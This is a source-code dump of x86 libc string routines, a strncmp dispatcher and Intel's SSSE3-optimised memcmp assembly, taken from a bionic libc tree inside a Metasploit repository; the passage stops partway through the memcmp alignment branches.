(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
 * strncmp() dispatcher: when the build enables SSSE3, instantiate the shared
 * SSSE3 strcmp template in length-bounded (strncmp) mode and export it as
 * "strncmp"; otherwise fall back to the generic strncmp.S.
 */
#if defined(USE_SSSE3)
/* Compile the template's length-limited code paths (the %ebp counter). */
# define USE_AS_STRNCMP
/* Rename the template's entry symbol (ssse3_strcmp_latest) to "strncmp". */
# define ssse3_strcmp_latest strncmp
# include "ssse3-strcmp.S"
#else
/* No SSSE3 available: use the generic implementation. */
# include "strncmp.S"
#endif
|
OpenWireSec/metasploit | 34,936 | external/source/meterpreter/source/bionic/libc/arch-x86/string/ssse3-memcmp3.S | /*
Copyright (c) 2010, Intel Corporation
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of Intel Corporation nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
 * Build-environment compatibility shims. Each macro is defined only if an
 * including wrapper has not already provided it (memcmp_wrapper.S, for
 * instance, predefines MEMCMP to choose the exported symbol name).
 */
#ifndef MEMCMP
/* Default exported symbol name when no wrapper overrides it. */
# define MEMCMP ssse3_memcmp3_new
#endif
#ifndef L
/* Local label helper: the .L prefix keeps labels out of the symbol table. */
# define L(label) .L##label
#endif
#ifndef ALIGN
/* ALIGN(n) aligns to 2^n bytes (GAS .p2align semantics). */
# define ALIGN(n) .p2align n
#endif
/* DWARF call-frame-information directives, aliased so they can be stubbed
 * out on toolchains without CFI support. */
#ifndef cfi_startproc
# define cfi_startproc .cfi_startproc
#endif
#ifndef cfi_endproc
# define cfi_endproc .cfi_endproc
#endif
#ifndef cfi_rel_offset
# define cfi_rel_offset(reg, off) .cfi_rel_offset reg, off
#endif
#ifndef cfi_restore
# define cfi_restore(reg) .cfi_restore (reg)
#endif
#ifndef cfi_adjust_cfa_offset
# define cfi_adjust_cfa_offset(off) .cfi_adjust_cfa_offset off
#endif
#ifndef ENTRY
/* Standard function prologue: type/visibility, 16-byte entry alignment,
 * label, and CFI open. */
# define ENTRY(name) \
	.type name, @function; \
	.globl name; \
	.p2align 4; \
name: \
	cfi_startproc
#endif
#ifndef END
/* Standard function epilogue bookkeeping: CFI close and symbol size. */
# define END(name) \
	cfi_endproc; \
	.size name, .-name
#endif
/* CFI bookkeeping for a 4-byte push/pop of a callee-saved register. */
#define CFI_PUSH(REG)		\
  cfi_adjust_cfa_offset (4);		\
  cfi_rel_offset (REG, 0)
#define CFI_POP(REG)		\
  cfi_adjust_cfa_offset (-4);		\
  cfi_restore (REG)
/* push/pop with matching CFI updates kept in lockstep. */
#define PUSH(REG)	pushl REG; CFI_PUSH (REG)
#define POP(REG)	popl REG; CFI_POP (REG)
/* cdecl stack layout on entry: return address at 0(%esp), so the first
 * argument lives at offset 4; BLK1/BLK2/LEN are memcmp's three arguments
 * (see the LEN/BLK1/BLK2 loads at the top of MEMCMP). */
#define PARMS		4
#define BLK1		PARMS
#define BLK2		BLK1+4
#define LEN		BLK2+4
/* Restore the three saved registers and return. RETURN additionally
 * re-declares the CFI pushes because it is emitted mid-function, where the
 * registers remain saved on the fall-through paths that follow it. */
#define RETURN_END	POP (%edi); POP (%esi); POP (%ebx); ret
#define RETURN		RETURN_END; CFI_PUSH (%ebx); CFI_PUSH (%edi); \
			CFI_PUSH (%esi)
.section .text.ssse3,"ax",@progbits
ENTRY (MEMCMP)
movl LEN(%esp), %ecx
movl BLK1(%esp), %eax
cmp $48, %ecx
movl BLK2(%esp), %edx
jae L(48bytesormore)
cmp $1, %ecx
jbe L(less1bytes)
PUSH (%ebx)
add %ecx, %edx
add %ecx, %eax
jmp L(less48bytes)
CFI_POP (%ebx)
ALIGN (4)
L(less1bytes):
jb L(zero)
movb (%eax), %cl
cmp (%edx), %cl
je L(zero)
mov $1, %eax
ja L(1bytesend)
neg %eax
L(1bytesend):
ret
ALIGN (4)
L(zero):
mov $0, %eax
ret
ALIGN (4)
L(48bytesormore):
PUSH (%ebx)
PUSH (%esi)
PUSH (%edi)
movdqu (%eax), %xmm3
movdqu (%edx), %xmm0
movl %eax, %edi
movl %edx, %esi
pcmpeqb %xmm0, %xmm3
pmovmskb %xmm3, %edx
lea 16(%edi), %edi
sub $0xffff, %edx
lea 16(%esi), %esi
jnz L(less16bytes)
mov %edi, %edx
and $0xf, %edx
xor %edx, %edi
sub %edx, %esi
add %edx, %ecx
mov %esi, %edx
and $0xf, %edx
jz L(shr_0)
xor %edx, %esi
cmp $8, %edx
jae L(next_unaligned_table)
cmp $0, %edx
je L(shr_0)
cmp $1, %edx
je L(shr_1)
cmp $2, %edx
je L(shr_2)
cmp $3, %edx
je L(shr_3)
cmp $4, %edx
je L(shr_4)
cmp $5, %edx
je L(shr_5)
cmp $6, %edx
je L(shr_6)
jmp L(shr_7)
ALIGN (4)
L(next_unaligned_table):
cmp $8, %edx
je L(shr_8)
cmp $9, %edx
je L(shr_9)
cmp $10, %edx
je L(shr_10)
cmp $11, %edx
je L(shr_11)
cmp $12, %edx
je L(shr_12)
cmp $13, %edx
je L(shr_13)
cmp $14, %edx
je L(shr_14)
jmp L(shr_15)
ALIGN (4)
L(shr_0):
cmp $80, %ecx
jae L(shr_0_gobble)
lea -48(%ecx), %ecx
xor %eax, %eax
movaps (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movaps 16(%esi), %xmm2
pcmpeqb 16(%edi), %xmm2
pand %xmm1, %xmm2
pmovmskb %xmm2, %edx
add $32, %edi
add $32, %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea (%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_0_gobble):
lea -48(%ecx), %ecx
movdqa (%esi), %xmm0
xor %eax, %eax
pcmpeqb (%edi), %xmm0
sub $32, %ecx
movdqa 16(%esi), %xmm2
pcmpeqb 16(%edi), %xmm2
L(shr_0_gobble_loop):
pand %xmm0, %xmm2
sub $32, %ecx
pmovmskb %xmm2, %edx
movdqa %xmm0, %xmm1
movdqa 32(%esi), %xmm0
movdqa 48(%esi), %xmm2
sbb $0xffff, %edx
pcmpeqb 32(%edi), %xmm0
pcmpeqb 48(%edi), %xmm2
lea 32(%edi), %edi
lea 32(%esi), %esi
jz L(shr_0_gobble_loop)
pand %xmm0, %xmm2
cmp $0, %ecx
jge L(shr_0_gobble_loop_next)
inc %edx
add $32, %ecx
L(shr_0_gobble_loop_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm2, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea (%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_1):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_1_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $1,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $1,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 1(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_1_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $1,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $1,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_1_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $1,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $1,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_1_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_1_gobble_next)
inc %edx
add $32, %ecx
L(shr_1_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 1(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_2):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_2_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $2,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $2,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 2(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_2_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $2,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $2,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_2_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $2,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $2,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_2_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_2_gobble_next)
inc %edx
add $32, %ecx
L(shr_2_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 2(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_3):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_3_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $3,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $3,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 3(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_3_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $3,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $3,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_3_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $3,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $3,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_3_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_3_gobble_next)
inc %edx
add $32, %ecx
L(shr_3_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 3(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_4):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_4_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $4,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $4,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 4(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_4_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $4,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $4,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_4_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $4,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $4,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_4_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_4_gobble_next)
inc %edx
add $32, %ecx
L(shr_4_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 4(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_5):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_5_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $5,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $5,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 5(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_5_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $5,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $5,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_5_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $5,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $5,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_5_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_5_gobble_next)
inc %edx
add $32, %ecx
L(shr_5_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 5(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_6):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_6_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $6,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $6,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 6(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_6_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $6,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $6,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_6_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $6,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $6,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_6_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_6_gobble_next)
inc %edx
add $32, %ecx
L(shr_6_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 6(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_7):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_7_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $7,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $7,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 7(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_7_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $7,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $7,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_7_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $7,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $7,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_7_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_7_gobble_next)
inc %edx
add $32, %ecx
L(shr_7_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 7(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_8):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_8_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $8,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $8,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 8(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_8_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $8,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $8,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_8_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $8,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $8,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_8_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_8_gobble_next)
inc %edx
add $32, %ecx
L(shr_8_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 8(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_9):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_9_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $9,(%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $9,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 9(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_9_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $9,(%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $9,16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_9_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $9,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $9,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_9_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_9_gobble_next)
inc %edx
add $32, %ecx
L(shr_9_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 9(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_10):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_10_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $10, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $10,%xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 10(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_10_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $10, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $10, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_10_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $10,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $10,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_10_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_10_gobble_next)
inc %edx
add $32, %ecx
L(shr_10_gobble_next):
test %edx, %edx
jnz L(exit)
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 10(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_11):
cmp $80, %ecx
lea -48(%ecx), %ecx
mov %edx, %eax
jae L(shr_11_gobble)
movdqa 16(%esi), %xmm1
movdqa %xmm1, %xmm2
palignr $11, (%esi), %xmm1
pcmpeqb (%edi), %xmm1
movdqa 32(%esi), %xmm3
palignr $11, %xmm2, %xmm3
pcmpeqb 16(%edi), %xmm3
pand %xmm1, %xmm3
pmovmskb %xmm3, %edx
lea 32(%edi), %edi
lea 32(%esi), %esi
sub $0xffff, %edx
jnz L(exit)
lea (%ecx, %edi,1), %eax
lea 11(%ecx, %esi,1), %edx
POP (%edi)
POP (%esi)
jmp L(less48bytes)
CFI_PUSH (%esi)
CFI_PUSH (%edi)
ALIGN (4)
L(shr_11_gobble):
sub $32, %ecx
movdqa 16(%esi), %xmm0
palignr $11, (%esi), %xmm0
pcmpeqb (%edi), %xmm0
movdqa 32(%esi), %xmm3
palignr $11, 16(%esi), %xmm3
pcmpeqb 16(%edi), %xmm3
L(shr_11_gobble_loop):
pand %xmm0, %xmm3
sub $32, %ecx
pmovmskb %xmm3, %edx
movdqa %xmm0, %xmm1
movdqa 64(%esi), %xmm3
palignr $11,48(%esi), %xmm3
sbb $0xffff, %edx
movdqa 48(%esi), %xmm0
palignr $11,32(%esi), %xmm0
pcmpeqb 32(%edi), %xmm0
lea 32(%esi), %esi
pcmpeqb 48(%edi), %xmm3
lea 32(%edi), %edi
jz L(shr_11_gobble_loop)
pand %xmm0, %xmm3
cmp $0, %ecx
jge L(shr_11_gobble_next)
inc %edx
add $32, %ecx
L(shr_11_gobble_next):
test %edx, %edx
jnz L(exit)
